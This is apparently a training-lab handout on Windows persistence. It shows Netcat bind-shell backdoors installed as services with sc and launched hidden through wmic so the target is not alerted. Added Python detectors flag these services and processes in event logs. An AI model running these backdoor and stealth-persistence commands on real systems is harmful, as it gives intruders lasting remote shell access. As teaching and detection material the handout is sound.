
Practical DAY 4

Maintaining presence and living-off-the-land techniques

Running Commands with SC and WMIC

We will use a simple and efficient method favoured by many attackers: run a command that invokes
Netcat to create a backdoor command shell on the target device.

nc.exe -l -p 4444 -e cmd.exe

In the Tools directory, there is a file called ncexer.bat that will create two terminal windows for you in
different colors. Run ncexer.bat with admin privileges.

The yellow screen will be our Attacker and the grey screen will be our Victim.

Victim (grey):

C:\> \????\Tools\nc.exe -nvlp 4444 -e cmd.exe

Attacker (yellow):

C:\> \????\Tools\nc.exe -nv 127.0.0.1 4444

This is a simple and very efficient backdoor shell for any Windows machine. The problem is that the
access disappears as soon as we kill the session. So how do we make it permanent? Create a service!

Attacker (yellow):

C:\> hostname
(here you will see your machine hostname)

Attacker (yellow):

C:\> sc \\Your_hostname create ncservice binpath= "c:\tools\nc.exe -l -p 4444 -e cmd.exe"

This is the same syntax we would use to create a service on a remote computer: sc accepts a \\hostname
argument and talks to that host's Service Control Manager.

Attacker (yellow):

C:\> sc \\Your_hostname query ncservice


The service STATE should be STOPPED.

Victim (grey):

C:\> netstat -nao 1 | find ":4444"


For this to work, port 4444 must not already be in use. If the port is still held by the listener from the
previous exercise, kill that process either with Task Manager or with the taskkill command:

Victim (grey):

C:\> taskkill /PID [process_ID]


Attacker (yellow):

C:\> sc \\Your_hostname start ncservice

In your Victim window, your netstat command should begin displaying output, indicating that TCP port
4444 is LISTENING. After 30 seconds, the sc command finishes with the error message "The service did not
respond to the start or control request in a timely fashion", because nc.exe is not a real service binary
and never reports its status back to the Service Control Manager.

Stop netstat command by pressing CTRL-C in the Victim (grey) window.

Then delete the original ncservice so that we can replace it with one that is more persistent, listening
beyond the 30-second timeout:

Attacker (yellow):

C:\> sc \\Your_hostname delete ncservice

Victim (grey):

C:\> netstat -nao 1 | find ":4444"


Attacker (yellow):

C:\> sc \\Your_hostname create ncservice2 binpath= "cmd.exe /k c:\tools\nc.exe -l -p 4444 -e cmd.exe"

Attacker (yellow):

C:\> sc \\Your_hostname start ncservice2


Although the command fails with the same error message, the listener keeps listening and the port
remains open. Let's test:

Attacker (yellow):

C:\> c:\tools\nc.exe 127.0.0.1 4444

If we stop the Netcat client and drop the connection, Netcat itself exits, because we invoked it with the
-l option. That option creates a listener that accepts a single connection and then stops running.
To make it persistent we need to invoke Netcat with -L instead, which goes back to listening after each
connection closes.

Kill the Netcat client by pressing CTRL-C in both windows. Then delete ncservice2 with this command:

Attacker (yellow):

C:\> sc \\Your_hostname delete ncservice2

Victim (grey):

C:\> netstat -nao | find ":4444"
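From the defender's side, the persistence trick above leaves a very visible trace: a new service whose image path is not a service binary at all but a Netcat listener, optionally wrapped in cmd.exe /k. The following is an added detection example, not part of this lab handout: it scores service-installation records (field names modelled on the Windows System log event "A service was installed in the system", Event ID 7045; the sample records themselves are constructed for this example) against a few indicators drawn from the commands in this exercise.

```python
import re

# Constructed sample records. Field names follow Windows System log Event ID 7045
# (ServiceName, ImagePath, ServiceType, StartType, AccountName); the values are made up
# for this example and two of them mirror the services created in this lab.
SAMPLE_SERVICE_INSTALLS = [
    {"ServiceName": "Spooler Helper",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "ncservice",
     "ImagePath": r"c:\tools\nc.exe -l -p 4444 -e cmd.exe",
     "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "ncservice2",
     "ImagePath": r"cmd.exe /k c:\tools\nc.exe -L -p 4444 -e cmd.exe",
     "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "BackupAgent",
     "ImagePath": r"C:\Program Files\Backup\agent.exe --service",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
]

# Each rule is (indicator name, regex applied to the ImagePath). Matching is case-insensitive,
# so the single-shot -l and the re-listening -L both count as a listener flag.
SERVICE_RULES = [
    ("netcat binary used as service image",
     re.compile(r"\b(nc|ncat|netcat)(64)?\.exe\b", re.I)),
    ("shell bound to a socket (-e cmd/powershell)",
     re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b", re.I)),
    ("listener flag (-l/-L)",
     re.compile(r"(^|\s)-[a-z]*l[a-z]*(\s|$)", re.I)),
    ("explicit listening port (-p NNNN or -lp NNNN)",
     re.compile(r"(^|\s)-[a-z]*p\s*\d{1,5}\b", re.I)),
    ("command interpreter wrapper (cmd.exe /k|/c)",
     re.compile(r"\bcmd(\.exe)?\s+/[kc]\b", re.I)),
]


def analyze_service_installs(records, min_hits=2):
    """Return one finding per record whose ImagePath matches at least min_hits rules.

    Requiring two independent indicators keeps a lone odd-looking flag (e.g. a vendor
    agent that happens to take -l) from firing on its own.
    """
    findings = []
    for rec in records:
        path = rec["ImagePath"]
        hits = [name for name, rx in SERVICE_RULES if rx.search(path)]
        if len(hits) >= min_hits:
            findings.append({
                "service": rec["ServiceName"],
                "account": rec["AccountName"],      # LocalSystem here: the shell would run as SYSTEM
                "start_type": rec["StartType"],
                "image_path": path,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_service_installs(SAMPLE_SERVICE_INSTALLS):
        print(f"[!] service {f['service']!r} as {f['account']}: {', '.join(f['indicators'])}")
        print(f"    ImagePath = {f['image_path']}")
```

Run against the constructed records, the two lab services are reported and the svchost and vendor-agent entries are not. On a real host the same function can be fed the parsed 7045 events, and the `account` field is worth surfacing because a service-hosted shell inherits LocalSystem by default, which is exactly the privilege difference the WMIC section below goes on to discuss.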

WMIC

Let's launch Netcat with wmic. We will now show that wmic is more efficient and has a smaller footprint
on the target. Note that the new process will not have local SYSTEM privileges as the service did; it
runs with the privileges of the account that invoked wmic, here administrator.

Victim (grey):

C:\> wmic process where name="nc.exe" list brief /every:1

Attacker (yellow):

C:\> wmic process call create "c:\tools\nc.exe -l -p 4444 -e cmd.exe"


Look at the output in the Victim window. Is the Netcat process running?

Attacker (yellow):

C:\> c:\tools\nc.exe 127.0.0.1 4444

A console window opened when we invoked Netcat using wmic. This is not good, as it might alert the
target. Let's try a new approach.

Attacker (yellow):

C:\> wmic process call create "c:\tools\nc.exe -dlp 4444 -e cmd.exe"

The -d option detaches Netcat from its console, so no window appears this time. Finally, clean up by
terminating the Netcat process:

C:\> wmic process where name="nc.exe" delete
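Launching a process through wmic has its own fingerprint: the new process is created by the WMI provider host, so in process-creation telemetry its parent is WmiPrvSE.exe rather than wmic.exe or the operator's shell. The following is an added detection example, not part of this lab handout: it walks process-creation records (field names modelled on Sysmon Event ID 1; the sample events are constructed and follow the wmic commands used in this exercise) and flags the WMI-spawned lineage together with the Netcat listener, bound-shell and detached-console flags.

```python
import re

# Constructed sample events. Field names follow Sysmon Event ID 1 (Image, CommandLine,
# ParentImage, User); the values are made up for this example.
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process call create "c:\\tools\\nc.exe -dlp 4444 -e cmd.exe"',
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "LAB\\admin"},
    {"Image": r"c:\tools\nc.exe",
     "CommandLine": "c:\\tools\\nc.exe -dlp 4444 -e cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "User": "LAB\\admin"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "LAB\\alice"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "whoami"',
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "User": "LAB\\svc_monitor"},
]

# Indicators over the command line (case-insensitive).
BOUND_SHELL = re.compile(r"(^|\s)-e\s+(cmd|powershell)(\.exe)?\b", re.I)  # -e cmd.exe
LISTEN_FLAG = re.compile(r"(^|\s)-[a-z]*l[a-z]*(\s|$)", re.I)             # -l, -L, -nvlp, -dlp
DETACH_FLAG = re.compile(r"(^|\s)-[a-z]*d[a-z]*(\s|$)", re.I)             # Windows nc.exe -d
WMIC_CREATE = re.compile(r"\bprocess\s+call\s+create\b", re.I)           # wmic process call create


def basename(path):
    """Lower-cased file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_process_events(events):
    """Return a finding for every event that shows at least one indicator.

    Two or more indicators together (e.g. WmiPrvSE.exe parent plus a bound shell) are
    rated "high"; a single one is rated "review" so that benign WMI-spawned processes
    are surfaced without being treated as confirmed incidents.
    """
    findings = []
    for ev in events:
        image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
        reasons = []
        if parent == "wmiprvse.exe":
            reasons.append("spawned by WmiPrvSE.exe (process created through WMI)")
        if image == "wmic.exe" and WMIC_CREATE.search(cmd):
            reasons.append("wmic 'process call create' used to launch a process")
        if BOUND_SHELL.search(cmd):
            reasons.append("shell bound to a socket (-e cmd/powershell)")
        if LISTEN_FLAG.search(cmd):
            reasons.append("listener flag (-l/-L)")
        if DETACH_FLAG.search(cmd):
            reasons.append("detached from console (-d): no visible window")
        if not reasons:
            continue
        findings.append({
            "image": image,
            "parent": parent,
            "user": ev["User"],
            "severity": "high" if len(reasons) >= 2 else "review",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in analyze_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[{f['severity']}] {f['parent']} -> {f['image']} as {f['user']}: {'; '.join(f['reasons'])}")
```

On the constructed events both halves of the wmic launch are rated high: the wmic.exe command itself and the nc.exe child under WmiPrvSE.exe. The cmd.exe spawned through WMI with only a WMI parent is rated "review", and the notepad.exe under explorer.exe is ignored. The `user` field shows the privilege point made above: the WMI-spawned process runs as the invoking account, not as SYSTEM.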
